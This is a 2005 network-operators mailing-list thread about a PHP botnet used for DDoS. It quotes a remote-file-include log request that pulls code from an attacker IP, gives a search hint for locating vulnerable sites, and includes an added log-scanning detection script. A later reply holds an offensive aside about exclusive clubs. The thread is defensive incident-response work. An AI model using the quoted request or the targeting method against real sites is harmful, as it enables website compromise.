Re: Destructive botnet originating from Japan
Here is a little update: As of last night authorities were able to seize the IRC server from the ISP in Japan and there will be extensive follow-up on it. The DDoS attack is now running headless in the happy range of about 3+ Gbps at around 7-9M PPS. The bots will continue attacking us until they receive the stop command from the bot master; there will never be a stop command, so we will continue to see packet love for a few months while people find that they are attacking us. We will publish a new list of the bots on Monday as we idle with this low traffic rate over the weekend.

The attacker was targeting a couple of customers that came into our environment after other solutions failed to work for them. After reviewing and comparing notes, it is obvious that the attacks were assassination attempts from a competitor. There was no extortion involved.

If you want to get the bots off your network, watch flow data destined to AS32787 with SYN floods to TCP 80 as the destination. Sites that use a PHP include (without validating the strings) to pull up different web sections and pages are at risk; a lot of people are reporting infection via "$section.php" and "$page.php". The attacker appears to have used Google to locate sites that use includes in that fashion (searching "index.php?page=" or "index.php?section=").

Reviewing infected machines for logs related to 210.170.60.2 would be an easy way to locate a past infection, but may not be reliable if the attacker starts a new botnet. An example of the log data looks something like this:

grep 210.170.60.2 access_log
210.170.60.2 - - [23/Dec/2005:11:45:37 +0000] "GET /index.php?section=http%3A//210.170.60.2/....? HTTP/1.0" 200 8010 "-" "Wget/1.6"

Happy hunting and have nice holidays!

-Barrett

--
Barrett Lyon
CTO and founder
Prolexic Technologies, Inc
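A log-review pass for the include abuse Barrett describes, added here as an example and not part of the original post: it parses Apache combined-format lines, flags include-style parameters whose value is a remote URL, and runs over a constructed sample log modelled on the grep output above. The parameter names (page, section), the documentation addresses and the check for https/ftp as well as http are assumptions that go slightly beyond the post.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Apache "combined" log format, matching the shape of the grep output quoted in the post.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Include-style parameter names the post reports being abused ("$page.php", "$section.php").
INCLUDE_PARAMS = {"page", "section"}
# URL schemes PHP can fetch for include() when remote URL wrappers are enabled (assumption: also watch https/ftp).
REMOTE_SCHEME = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# Constructed sample log: the first line is modelled on the one in the post,
# the others use RFC 5737 documentation addresses.
SAMPLE_LOG = [
    '210.170.60.2 - - [23/Dec/2005:11:45:37 +0000] "GET /index.php?section=http%3A//210.170.60.2/....? HTTP/1.0" 200 8010 "-" "Wget/1.6"',
    '192.0.2.10 - - [23/Dec/2005:12:01:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [23/Dec/2005:12:05:44 +0000] "GET /index.php?page=ftp://198.51.100.7/x HTTP/1.0" 200 7000 "-" "libwww-perl/5.79"',
    'not a log line at all',
]

def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def is_remote_include(target):
    """True when an include-style query parameter points at an external URL."""
    # parse_qsl percent-decodes values ('http%3A//' -> 'http://'); unquote once more
    # so a double-encoded scheme ('http%253A//') is caught as well.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name.lower() in INCLUDE_PARAMS and REMOTE_SCHEME.match(unquote(value)):
            return True
    return False

def find_rfi_attempts(lines):
    """Return (client ip, request target, status, user agent) for each suspicious request.

    A 200 status only says the page rendered, not that the remote file was executed:
    treat each hit as a host to inspect, not as a confirmed compromise."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec and is_remote_include(rec["target"]):
            hits.append((rec["ip"], rec["target"], rec["status"], rec["ua"]))
    return hits

if __name__ == "__main__":
    for ip, target, status, ua in find_rfi_attempts(SAMPLE_LOG):
        print(f"{ip} {status} {ua}: {target}")
```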
Hi, NANOGers.

We've seen these PHP-built botnets for about two years now. They have recently become more popular. This is due to the fact that a very few of these bots can send out far more packet love than a large collection of broadband (generally Windows) bots. Return on investment and all that.

Most bots don't attack "forever." The typical bot commands give an attack duration in either packets or time. I suspect that'll be the case with this botnet, so the attack may not last for months. In other words, it would be wise to check those flows sooner rather than later.

Folks shouldn't focus solely on PHP, though that is the rage du jour. Even the venerable PhatBot family, generally used to compromise hosts running Windows, had a Linux spreader in it. Increasingly Unix systems and Cisco routers are the primary targets.

Keep in mind that botnets are but one facet of the threat. There are a plethora of just-in-time DoSnets built off of the same vulnerabilities. In this case there is no central command and control, making mitigation even more challenging. It's fairly easy to run a command on a vulnerable host through the same exploit that will permit one to install a bot. Just-in-time DoSnets are readily built and used in amplification attacks as well.

Bots have never been solely a Windows problem.

Thanks,
Rob.
--
Rob Thomas
Team Cymru
http://www.cymru.com/
ASSERT(coffee != empty);
On Sat, 24 Dec 2005, Rob Thomas wrote:
> Hi, NANOGers.
> We've seen these PHP-built botnets for about two years now. They have recently become more popular. This is due to the fact that a very few of these bots can send out far more packet love than a large collection of broadband (generally Windows) bots. Return on investment and all that.
And that, due to traditions and fascination with killing C&C's rather than facing the problem itself, the Bad Guys keep having to learn and evolve. And indeed, wonder of wonders, we see for years now the /technological/ AND /operational/ capabilities of the offenders, both kiddies and organized crime (being the main two players), evolving in their capabilities... from the malware development to employing real operatives in meat-space. ROI is indeed the deal here, as you said. I always am happy about your presence and understanding of these issues.. even if I often find the language problem to be a special difficulty for communication between us.

There are not millions of dollars involved, but rather billions. Phishing alone shows us approx. half a billion dollars lost through only the first half of 2005.

PHP botnets have been around for a long time, as were web-knockers before them. Like IRC they are still around, and like IRC they are used both for control and propagation.

As long as we remain short-sighted, NSP-SEC style, we will continue to fight fires rather than preventing them and fighting the actual problems. There is NO BETTER OR GREATER force for the betterment of the Internet than NSP-SEC, but it is my belief that currently it does more harm than good, in the long run. I take it back, it is not my belief - I know so. It is difficult to hear something important that one invested much in is doing harm, but that is the only conclusion I and others can come up with after years of study, and NSP-SEC, as amazing as it has been, has been of a negative impact other than to cause a community to form and act together. Which is amazing by itself and which is why I believe it can do so much more.. even if it is relatively young it has proven itself time and time again... I am straying from the subject here.
> Most bots don't attack "forever." The typical bot commands give an attack duration in either packets or time. I suspect that'll be the case with this botnet, so the attack may not last for months. In other words, it would be wise to check those flows sooner rather than later.
Word for word. I am happy there are at least a few people out there who really understand, like yourself.
> Folks shouldn't focus solely on PHP, though that is the rage du jour. Even the venerable PhatBot family, generally used to compromise hosts running Windows, had a Linux spreader in it. Increasingly Unix systems and Cisco routers are the primary targets.
Bots in this meaning originated on *nix machines and there are quite a few groups out there that employ them still quite regularly. Networking folks here should not forget this is not just a networking problem and that there are many people working on this in the anti-spam, anti-virus, anti-whatever industries as well as in academic life and Government.
> Keep in mind that botnets are but one facet of the threat. There are a plethora of just-in-time DoSnets built off of the same vulnerabilities. In this case there is no central command and control making mitigation even more challenging. It's fairly easy to run a command on a vulnerable host through the same exploit that will permit one to install a bot. Just-in-time DoSnets are readily built and used in amplification attacks as well.
DoS is fine, but as critical as it is, it is indeed the short-sighted concern. Millions of bots... following financial transactions on every one and correlating information, impacting world economy and... I don't need to go on, you know of some of these things far better than me.
> Bots have never been solely a Windows problem.
And they have never been the real problem. They are but a symptom of the real problem. Online cooperation, liability and vulnerability are... and the Bad Guys being "funded" by millions and billions in R&D from ROI doesn't help much. It's time to move to the next stage.
> Thanks,
> Rob.
> --
> Rob Thomas
> Team Cymru
> http://www.cymru.com/
> ASSERT(coffee != empty);
Gadi.
On Sun, Dec 25, 2005 at 02:06:38AM -0600, Gadi Evron wrote:
> It is difficult to hear something important that one invested much in is doing harm, but that is the only conclusion I and others can come up with after years of study, and NSP-SEC, as amazing as it has been, has been of a negative impact other than to cause a community to form and act together. Which is amazing by itself and which is why I believe it can do so much more.. even if it is relatively young it has proven itself time and time again... I am straying from the subject here.
Could have told you that a long time ago. NSP-SEC became useless the day it became so bogged down in its own self-aggrandizing paranoia that no one could possibly be bothered to actually tell anyone outside of the secret handshake club about security issues they've spotted.

On the other hand, if you ARE going to sit around pissing and moaning about botnets you are too "sekure" to tell anyone else about, thus assuring they never get fixed, at least it's nice to do it in one secret place so I don't have to hear it. :)

--
Richard A Steenbergen <ras@e-gerbil.net>
http://www.e-gerbil.net/ras
GPG Key ID: 0xF8B12CBC (7535 7F59 8204 ED1F CC1C 53AF 4C41 5ECA F8B1 2CBC)
On Sun, 25 Dec 2005, Richard A Steenbergen wrote:
> On Sun, Dec 25, 2005 at 02:06:38AM -0600, Gadi Evron wrote:
> > It is difficult to hear something important that one invested much in is doing harm, but that is the only conclusion I and others can come up with after years of study, and NSP-SEC, as amazing as it has been, has been of a negative impact other than to cause a community to form and act together. Which is amazing by itself and which is why I believe it can do so much more.. even if it is relatively young it has proven itself time and time again... I am straying from the subject here.
> Could have told you that a long time ago. NSP-SEC became useless the day it became so bogged down in its own self-aggrandizing paranoia that no one could possibly be bothered to actually tell anyone outside of the secret handshake club about security issues they've spotted.
> On the other hand, if you ARE going to sit around pissing and moaning about botnets you are too "sekure" to tell anyone else about, thus assuring they never get fixed, at least it's nice to do it in one secret place so I don't have to hear it. :)
There is a lot to be said of NSP-SEC which is positive, not much which is negative. I am not sure where we would be today if not for NSP-SEC. Further, I believe that:

1. In today's world secret-handshake clubs for all-white all-rich all-christians are necessary for our security.
2. Much of what is being kept secret is silly, for the Bad Guys have that information and the Good Guys fight day and night to try and grab a bit of it.

In my opinion working with other communities and industries, as long as security can be maintained in a vetted environment, is critical. That said, it has always been my goal to make public as much data as *possible*.

As to NSP-SEC, it is off-topic for this list to discuss NSP-SEC policies and people here should be thankful it is there. NSP-SEC officials can reply if they like, but I doubt they will bother as they as well as the rest of us know what they are worth.

As to their arrogance... I believe it is ignorance (!- stupidity) of the harm they cause and I will probably get flamed for saying this as I really hold them in an extremely high regard.. but that is how I and everyone else who has worked on botnets beyond network operations that I know personally and discussed this with will call it.

Gadi